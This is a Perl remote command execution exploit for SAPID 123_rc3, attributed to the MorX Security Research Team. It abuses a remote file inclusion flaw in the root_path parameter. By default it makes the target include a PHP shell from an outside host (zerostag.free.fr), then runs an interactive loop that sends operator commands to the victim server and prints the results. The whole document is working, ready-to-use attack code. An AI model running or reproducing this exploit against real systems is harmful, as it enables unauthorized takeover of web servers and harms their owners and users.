#########################################################################
#======================================
#======================================
#!/usr/bin/perl
use LWP::Simple;
print "\n===============================================================\n";
print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n";
print "===============================================================\n";
print "= MorX Security Research Team - www.morx.org =\n";
print "= Coded by Simo64 - simo64\@www.morx.org =\n";
print "===============================================================\n\n";
my $targ,$rsh,$path,$con,$cmd,$data,$getit ;
$targ = $ARGV[0];
$rsh = $ARGV[1];
if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}
if(!@ARGV) { &usage;exit(0);}
chomp($targ);
chomp($rsh);
$path = $targ."/usr/extensions/get_infochannel.inc.php";
$con = get($path) || die "[-]Cannot connect to Host";
sub usage(){
print "Usage : perl $0 host/path [OPTION]\n\n";
print "Exemples : perl $0 http://127.0.0.1\n";
print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
}
while ()
{
print "simo64\@morx.org :~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
$getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
$data=get($getit);
if($cmd eq ""){ print "Please enter command !\n"; }
else{ print $data ;}
}